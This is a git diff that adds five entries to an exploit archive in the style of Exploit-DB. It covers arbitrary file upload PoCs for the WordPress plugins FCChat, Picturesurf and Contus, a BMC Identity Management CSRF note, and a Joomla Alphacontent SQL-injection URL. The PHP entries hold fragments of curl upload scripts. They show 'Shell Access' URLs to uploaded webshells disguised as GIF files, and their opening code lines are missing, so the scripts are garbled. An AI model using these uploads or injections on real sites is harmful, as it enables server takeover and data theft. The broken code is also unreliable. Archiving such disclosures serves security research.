diff --git a/files.csv b/files.csv index 627ac1d6e..f7c555ef1 100755 --- a/files.csv +++ b/files.csv @@ -33723,3 +33723,8 @@ id,file,description,date,author,platform,type,port 37367,platforms/windows/local/37367.rb,"Windows ClientCopyImage Win32k Exploit",2015-06-24,metasploit,windows,local,0 37368,platforms/multiple/remote/37368.rb,"Adobe Flash Player ShaderJob Buffer Overflow",2015-06-24,metasploit,multiple,remote,0 37369,platforms/php/webapps/37369.txt,"Vesta Control Panel 0.9.8 - OS Command Injection",2015-06-24,"High-Tech Bridge SA",php,webapps,0 +37370,platforms/php/webapps/37370.php,"WordPress FCChat Widget Plugin 2.2.x 'Upload.php' Arbitrary File Upload Vulnerability",2012-06-07,"Sammy FORGIT",php,webapps,0 +37371,platforms/php/webapps/37371.php,"WordPress Picturesurf Gallery Plugin 'upload.php' Arbitrary File Upload Vulnerability",2012-06-03,"Sammy FORGIT",php,webapps,0 +37372,platforms/java/webapps/37372.html,"BMC Identity Management Cross Site Request Forgery Vulnerability",2012-06-11,"Travis Lee",java,webapps,0 +37373,platforms/php/webapps/37373.php,"WordPress Contus Video Gallery Plugin 'upload1.php' Arbitrary File Upload Vulnerability",2012-06-12,"Sammy FORGIT",php,webapps,0 +37374,platforms/php/webapps/37374.txt,"Joomla! Alphacontent Component 'limitstart' Parameter SQL Injection Vulnerability",2012-06-10,xDarkSton3x,php,webapps,0 diff --git a/platforms/java/webapps/37372.html b/platforms/java/webapps/37372.html new file mode 100755 index 000000000..23aff5419 --- /dev/null +++ b/platforms/java/webapps/37372.html @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/53924/info + +Identity Management is prone to a cross-site request-forgery vulnerability because the application fails to properly validate HTTP requests. + +Exploiting this issue may allow a remote attacker to perform certain actions in the context of an authorized user's session and gain unauthorized access to the affected application; other attacks are also possible. + +BMC IDM Change PW CSRF PoC
\ No newline at end of file diff --git a/platforms/php/webapps/37370.php b/platforms/php/webapps/37370.php new file mode 100755 index 000000000..277fe1e47 --- /dev/null +++ b/platforms/php/webapps/37370.php @@ -0,0 +1,31 @@ +source: http://www.securityfocus.com/bid/53855/info + +WordPress FCChat Widget plugin is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input. + +An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. + +WordPress FCChat Widget plugin 2.2.12.2 through versions 2.2.13.1 are vulnerable. + +"@$uploadfile", + 'Submit'=>'submit')); +curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); +$postResult = curl_exec($ch); +curl_close($ch); +print "$postResult"; + +?> + +Shell Access : +http://www.exemple.com/wordpress/wp-content/plugins/fcchat/html/images/1_lo.php.gif + +lo.php.gif + \ No newline at end of file diff --git a/platforms/php/webapps/37371.php b/platforms/php/webapps/37371.php new file mode 100755 index 000000000..72887930c --- /dev/null +++ b/platforms/php/webapps/37371.php @@ -0,0 +1,33 @@ +source: http://www.securityfocus.com/bid/53894/info + +Picturesurf Gallery plugin is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input. + +An attacker can exploit this issue to upload arbitrary PHP code and run it in the context of the Web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. + +Picturesurf Gallery 1.2 is vulnerable; other versions may also be affected. + +PostShell.php +"@$uploadfile", +'is_simple'=>'is_simple')); +curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); +$postResult = curl_exec($ch); +curl_close($ch); +print "$postResult"; + +?> + +Shell Access : +http://www.exemple.com/wordpress/wp-content/plugins/picturesurf-gallery/data/upload/lo.php.gif + +lo.php.gif +GIF89a???????????!??????,???????D?;? + \ No newline at end of file diff --git a/platforms/php/webapps/37373.php b/platforms/php/webapps/37373.php new file mode 100755 index 000000000..34d9e1bd0 --- /dev/null +++ b/platforms/php/webapps/37373.php @@ -0,0 +1,22 @@ +source: http://www.securityfocus.com/bid/53931/info + +WordPress Contus Video Gallery is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input. + +An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. + +WordPress Contus Video Gallery 1.3 is vulnerable; other versions may also be affected. + +"@$uploadfile", + 'mode'=>'image')); +curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); +$postResult = curl_exec($ch); +curl_close($ch); +print "$postResult"; + +?> diff --git a/platforms/php/webapps/37374.txt b/platforms/php/webapps/37374.txt new file mode 100755 index 000000000..81f252ede --- /dev/null +++ b/platforms/php/webapps/37374.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/53942/info + +The Alphacontent component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/index.php?option=com_alphacontent§ion=weblinks&Itemid=1&lang=de&limitstart=[sqli] \ No newline at end of file